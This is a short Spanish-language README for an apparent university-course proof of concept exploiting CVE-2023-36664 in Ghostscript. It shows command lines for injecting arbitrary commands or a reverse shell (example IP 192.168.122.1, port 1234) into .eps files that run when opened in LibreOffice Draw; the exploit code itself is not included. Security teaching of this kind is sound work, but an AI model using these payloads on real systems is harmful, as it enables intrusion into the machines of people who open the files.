
Python PoC para CVE-2023-36664 Ghostscript RCE. Inyecta payloads o reverse shells en archivos .eps para desencadenar la ejecución de código a través de LibreOffice Draw.
Prueba de concepto para el CVE-2023-36664.
Para insertar un payload en un archivo .eps :
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
Para insertar un payload de reverse shell en un archivo .eps :
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
La apertura del archivo inyectado en Libreoffice Draw debería ejecutar el payload.
Esta prueba de concepto fue desarrollada para un curso específico en la universidad. Se publica aquí únicamente con fines pedagógicos.